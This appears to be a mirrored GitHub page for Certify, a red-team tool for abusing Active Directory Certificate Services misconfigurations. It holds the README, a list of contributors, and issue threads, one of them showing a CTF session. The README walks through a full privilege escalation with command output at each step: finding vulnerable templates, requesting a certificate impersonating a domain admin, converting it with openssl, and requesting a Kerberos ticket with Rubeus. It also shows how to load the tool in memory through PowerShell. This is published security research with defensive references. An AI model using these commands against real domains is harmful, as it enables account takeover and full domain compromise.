Giter Site home page Giter Site logo

certify's Introduction

Certify

Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

@harmj0y and @tifkin_ are the primary authors of Certify and the the associated AD CS research (blog and whitepaper).

Table of Contents

Usage

C:\Tools>Certify.exe

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0


  Find information about all registered CAs:

    Certify.exe cas [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/hideAdmins] [/showAllPermissions] [/skipWebServiceChecks] [/quiet]


  Find all enabled certificate templates:

    Certify.exe find [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find vulnerable/abusable certificate templates using default low-privileged groups:

    Certify.exe find /vulnerable [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find vulnerable/abusable certificate templates using all groups the current user context is a part of:

    Certify.exe find /vulnerable /currentuser [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find enabled certificate templates where ENROLLEE_SUPPLIES_SUBJECT is enabled:

    Certify.exe find /enrolleeSuppliesSubject [/ca:SERVER\ca-name| /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find enabled certificate templates capable of client authentication:

    Certify.exe find /clientauth [/ca:SERVER\ca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]

  Find all enabled certificate templates, display all of their permissions, and don't display the banner message:

    Certify.exe find /showAllPermissions /quiet [/ca:COMPUTER\CA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]

  Find all enabled certificate templates and output to a json file:

    Certify.exe find /json /outfile:C:\Temp\out.json [/ca:COMPUTER\CA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]


  Enumerate access control information for PKI objects:

    Certify.exe pkiobjects [/domain:domain.local] [/showAdmins] [/quiet]


  Request a new certificate using the current user context:

    Certify.exe request /ca:SERVER\ca-name [/subject:X] [/template:Y] [/install]

  Request a new certificate using the current machine context:

    Certify.exe request /ca:SERVER\ca-name /machine [/subject:X] [/template:Y] [/install]

  Request a new certificate using the current user context but for an alternate name (if supported):

    Certify.exe request /ca:SERVER\ca-name /template:Y /altname:USER

  Request a new certificate on behalf of another user, using an enrollment agent certificate:

    Certify.exe request /ca:SERVER\ca-name /template:Y /onbehalfof:DOMAIN\USER /enrollcert:C:\Temp\enroll.pfx [/enrollcertpw:CERT_PASSWORD]


  Download an already requested certificate:

    Certify.exe download /ca:SERVER\ca-name /id:X [/install] [/machine]



Certify completed in 00:00:00.0200190

Using Requested Certificates

Certificates can be transformed to .pfx's usable with Certify with:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certificates can be used with Rubeus to request a TGT with:

Rubeus.exe asktgt /user:X /certificate:C:\Temp\cert.pfx /password:<CERT_PASSWORD>

Example Walkthrough

First, use Certify.exe to see if there are any vulnerable templates:

C:\Temp>Certify.exe find /vulnerable
   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=theshire,DC=local'
[*] Restricting to CA name : dc.theshire.local\theshire-DC-CA

[*] Listing info about the Enterprise CA 'theshire-DC-CA'

    Enterprise CA Name            : theshire-DC-CA
    DNS Hostname                  : dc.theshire.local
    FullName                      : dc.theshire.local\theshire-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=theshire-DC-CA, DC=theshire, DC=local
    Cert Thumbprint               : 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2
    Cert Serial                   : 14BFC25F2B6EEDA94404D5A5B0F33E21
    Cert Start Date               : 1/4/2021 10:48:02 AM
    Cert End Date                 : 1/4/2026 10:58:02 AM
    Cert Chain                    : CN=theshire-DC-CA,DC=theshire,DC=local
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
      Allow  ManageCA, Read, Enroll                     THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
        [!] Low-privileged principal has ManageCA rights!
      Allow  Enroll                                     THESHIRE\Domain Computers     S-1-5-21-937929760-3187473010-80948926-515
      Allow  ManageCA, ManageCertificates               THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
      Allow  ManageCertificates, Enroll                 THESHIRE\certmanager          S-1-5-21-937929760-3187473010-80948926-1605
      Allow  ManageCA, Enroll                           THESHIRE\certadmin            S-1-5-21-937929760-3187473010-80948926-1606
    Enrollment Agent Restrictions :
      Everyone                      S-1-1-0
        Template : <All>
        Targets  :
          Everyone                  S-1-1-0

      Everyone                      S-1-1-0
        Template : User
        Targets  :
          Everyone                  S-1-1-0

Vulnerable Certificates Templates :

    CA Name                         : dc.theshire.local\theshire-DC-CA
    Template Name                   : User2
    Validity Period                 : 2 years
    Renewal Period                  : 6 weeks
    msPKI-Certificates-Name-Flag    : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        All Extended Rights         : THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
      Object Control Permissions
        Owner                       : THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        Full Control Principals     : THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
        WriteOwner Principals       : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        WriteDacl Principals        : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
        WriteProperty Principals    : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519

    CA Name                         : dc.theshire.local\theshire-DC-CA
    Template Name                   : VulnTemplate
    Validity Period                 : 3 years
    Renewal Period                  : 6 weeks
    msPKI-Certificates-Name-Flag    : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Domain Users         S-1-5-21-937929760-3187473010-80948926-513
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
      Object Control Permissions
        Owner                       : THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteOwner Principals       : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteDacl Principals        : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000
        WriteProperty Principals    : THESHIRE\Domain Admins        S-1-5-21-937929760-3187473010-80948926-512
                                      THESHIRE\Enterprise Admins    S-1-5-21-937929760-3187473010-80948926-519
                                      THESHIRE\localadmin           S-1-5-21-937929760-3187473010-80948926-1000



Certify completed in 00:00:00.6548319

Given the above results, we have the three following issues:

  1. THESHIRE\Domain Users have ManageCA permissions over the dc.theshire.local\theshire-DC-CA CA (ESC7)
    • This means that the EDITF_ATTRIBUTESUBJECTALTNAME2 flag can be flipped on the CA by anyone.
  2. THESHIRE\Domain Users have full control over the User2 template (ESC4)
    • This means that anyone can flip the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag on this template and remove the PEND_ALL_REQUESTS issuance requirement.
  3. THESHIRE\Domain Users can enroll in the VulnTemplate template, which can be used for client authentication and has ENROLLEE_SUPPLIES_SUBJECT set (ESC1)
    • This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA).

We'll show the abuse of scenario 3.

Next, let's request a new certificate for this template/CA, specifying a DA localadmin as the alternate principal:

C:\Temp>Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : THESHIRE\harmj0y
[*] No subject name specified, using current context as subject.

[*] Template                : VulnTemplate
[*] Subject                 : CN=harmj0y, OU=TestOU, DC=theshire, DC=local
[*] AltName                 : localadmin

[*] Certificate Authority   : dc.theshire.local\theshire-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 337

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAn8bKuwCYj8...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGITCCBQmgAwIBAgITVQAAAV...
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:04.2127911

Copy the -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section to a file on Linux/macOS, and run the openssl command to convert it to a .pfx. When prompted, don't enter a password:

(base) laptop:~ harmj0y$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
(base) laptop:~ harmj0y$

Finally, move the cert.pfx to your target machine filesystem (manually or through Cobalt Strike), and request a TGT for the altname user using Rubeus:

C:\Temp>Rubeus.exe asktgt /user:localadmin /certificate:C:\Temp\cert.pfx

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=harmj0y, OU=TestOU, DC=theshire, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'theshire.local\localadmin'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFujCCBbagAwIBBaEDAgEWooIExzCC...(snip)...

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  localadmin
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  2/22/2021 2:06:51 PM
  EndTime               :  2/22/2021 3:06:51 PM
  RenewTill             :  3/1/2021 2:06:51 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  Etb5WPFWeMbsZr2+FQQQMw==

Defensive Considerations

Certify was released at Black Hat 2021 with our "Certified Pre-Owned: Abusing Active Directory Certificate Services" talk.

The TypeRefHash of the current Certify codebase is f9dbbfe2527e1164319350c0b0900c58be57a46c53ffef31699ed116a765995a.

The TypeLib GUID of Certify is 64524ca5-e4d0-41b3-acc3-3bdbefd40c97. This is reflected in the Yara rules currently in this repo.

See our whitepaper for prevention and detection guidance.

Compile Instructions

We are not planning on releasing binaries for Certify, so you will have to compile yourself :)

Certify has been built against .NET 4.0 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build.

Sidenote: Running Certify Through PowerShell

If you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string):

$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

The Main() method and any arguments can then be invoked as follows:

[Certify.Program]::Main("find /vulnerable".Split())

Sidenote Sidenote: Running Certify Over PSRemoting

Due to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily, Certify has a function to help with that.

If you follow the instructions in Sidenote: Running Certify Through PowerShell to create a Certify.ps1, append something like the following to the script:

[Certify.Program]::MainString("find /vulnerable")

You should then be able to run Certify over PSRemoting with something like the following:

$s = New-PSSession dc.theshire.local
Invoke-Command -Session $s -FilePath C:\Temp\Certify.ps1

Alternatively, Certify's /outfile:C:\FILE.txt argument will redirect all output streams to the specified file.

Reflections

On the subject of public disclosure, we self-embargoed the release of our offensive tooling (Certify as well as ForgeCert) for ~45 days after we published our whitepaper in order to give organizations a chance to get a grip on the issues surrounding Active Directory Certificate Services. We also preemptively released some Yara rules/IOCs for both projects and released the defensive-focused PSPKIAudit PowerShell project along with the whitepaper. However, we have found that organizations and vendors have historically often not fixed issues or built detections for "theoretical" attacks until someone proves something is possible with a proof of concept.

Acknowledgments

Certify used a few resources found online as reference and inspiration:

The AD CS work was built on work from a number of others. The whitepaper has a complete treatment, but to summarize:

certify's People

Contributors

bchurchill avatar ccob avatar daem0nc0re avatar harmj0y avatar leechristensen avatar ll1a4x avatar luemmelsec avatar michiellemmens avatar saerxcit avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

topotam timb-machine-mirrors l1kw1d lberezy clavoillotte dr1276 leftp bluesky92 bb33bb funnydog896 redteamseed ashr an0n1m1z3 gh0st0ne gavz th3k3ymak3r zha0 patrilic y0d4a mubix donnmyth yangshuangfu t43wiu6 one-org aseigler mars-cheng meditology seahop shadowce vysecurity legly mokeneto wisdark hackinfinity askyeye fdlucifer zhouzu jack51706 5l1v3r1 madusec daem0nc0re nocomp optionalg nullbind sasqwatch cablethief x0rin c0isini bl4d3666 tmcmil shlomin375 scriptidiot l0ss invokethreatguy michiellemmens 30579096 gerh4rdt mikikatz servomekanism git4artifact tijme fuzzyun1c0rn sliverarmory blackarrowsec crackercat kopfjager007 justinforbes mohinparamasivam lolici123 kobbimikk killvxk int2ecall thecryinggame silocityit javierrprada midnightlurker autochampion xopohsxxwj kyle-phillips rvrsh3ll ccob 0next0 hartl3y94 hhhhelix startagain2016 badguy233 christruncer ammasajan kiwids0220 6b6f6c6a61 c3pain rakhithjk laowang1026 offsecguy bravery9 bgrstar sathish09 emanuelduss luemmelsec ll1a4x

certify's Issues

Crashing on Windows server 2019

Hi,

When trying to request a certificate on a Windows Server 2019 machine, I get the following:

image

I get this when running it as system on the machine.

Vulnarable works but vulnerable doesn't?

The information below is from a CTF, so none of it is sensitive, but i recently noticed that using

certify.exe find /vulnerable

Does not work, it says "no vulnerable certificates templates found!"

But if I try with the incorrect spelling

certify.exe find /vulnarable

It finds vulnerable templates without issue, it's a bit confusing because vulnarable is not correct spelling of the word, but for now using find /abusable also works

Evil-WinRM PS C:\Users\Raven\AppData\Local\Temp> ./certify.exe find /vulnerable

/ | | | ()/ |
| | ___ _ | | | | _ _
| | / _ \ '_| | | | | | |
| || __/ | | || | | | || |
____|| _||| _, |
/ |
|./
v1.1.0

[] Action: Find certificate templates
[] Using the search base 'CN=Configuration,DC=manager,DC=htb'

[*] Listing info about the Enterprise CA 'manager-DC01-CA'

Enterprise CA Name            : manager-DC01-CA
DNS Hostname                  : dc01.manager.htb
FullName                      : dc01.manager.htb\manager-DC01-CA
Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName              : CN=manager-DC01-CA, DC=manager, DC=htb
Cert Thumbprint               : ACE850A2892B1614526F7F2151EE76E752415023
Cert Serial                   : 5150CE6EC048749448C7390A52F264BB
Cert Start Date               : 7/27/2023 3:21:05 AM
Cert End Date                 : 7/27/2122 3:31:04 AM
Cert Chain                    : CN=manager-DC01-CA,DC=manager,DC=htb
UserSpecifiedSAN              : Disabled
CA Permissions                :
  Owner: BUILTIN\Administrators        S-1-5-32-544

  Access Rights                                     Principal

  Deny   ManageCA, Read                             MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
  Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
  Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
  Allow  ManageCA, ManageCertificates               MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
  Allow  ManageCA, ManageCertificates               MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Allow  ManageCA, Enroll                           MANAGER\Raven                 S-1-5-21-4078382237-1492182817-2568127209-1116
  Allow  Enroll                                     MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!

Certify completed in 00:00:07.0877306
Evil-WinRM PS C:\Users\Raven\AppData\Local\Temp> ./certify.exe
find /vulnarable

/ | | | ()/ |
| | ___ _ | | | | _ _
| | / _ \ '_| | | | | | |
| || __/ | | || | | | || |
____|| _||| _, |
/ |
|./
v1.1.0

[] Action: Find certificate templates
[] Using the search base 'CN=Configuration,DC=manager,DC=htb'

[*] Listing info about the Enterprise CA 'manager-DC01-CA'

Enterprise CA Name            : manager-DC01-CA
DNS Hostname                  : dc01.manager.htb
FullName                      : dc01.manager.htb\manager-DC01-CA
Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName              : CN=manager-DC01-CA, DC=manager, DC=htb
Cert Thumbprint               : ACE850A2892B1614526F7F2151EE76E752415023
Cert Serial                   : 5150CE6EC048749448C7390A52F264BB
Cert Start Date               : 7/27/2023 3:21:05 AM
Cert End Date                 : 7/27/2122 3:31:04 AM
Cert Chain                    : CN=manager-DC01-CA,DC=manager,DC=htb
UserSpecifiedSAN              : Disabled
CA Permissions                :
  Owner: BUILTIN\Administrators        S-1-5-32-544

  Access Rights                                     Principal

  Deny   ManageCA, Read                             MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
  Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
  Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
  Allow  ManageCA, ManageCertificates               MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
  Allow  ManageCA, ManageCertificates               MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Allow  ManageCA, Enroll                           MANAGER\Raven                 S-1-5-21-4078382237-1492182817-2568127209-1116
  Allow  Enroll                                     MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : User
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Users          S-1-5-21-4078382237-1492182817-2568127209-513
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : EFS
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Encrypting File System
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Users          S-1-5-21-4078382237-1492182817-2568127209-513
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : Administrator
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : EFSRecovery
Schema Version                        : 1
Validity Period                       : 5 years
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : File Recovery
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : Machine
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag                 : AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Server Authentication
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Computers      S-1-5-21-4078382237-1492182817-2568127209-515
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
  Object Control Permissions
    Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
    WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

CA Name                               : dc01.manager.htb\manager-DC01-CA
Template Name                         : DomainController
Schema Version                        : 1
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Server Authentication
mspki-certificate-application-policy  : <null>
Permissions
  Enrollment Permissions
    Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                  MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                  MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                  MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
